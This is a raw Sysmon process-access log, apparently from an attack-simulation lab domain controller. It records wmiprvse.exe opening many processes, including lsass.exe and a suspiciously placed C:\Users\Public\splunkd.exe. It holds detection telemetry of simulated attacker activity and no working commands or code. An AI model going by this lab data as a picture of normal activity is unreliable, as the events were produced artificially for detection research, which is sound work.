16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.122{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B3-6008-CE06-00000000A301}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 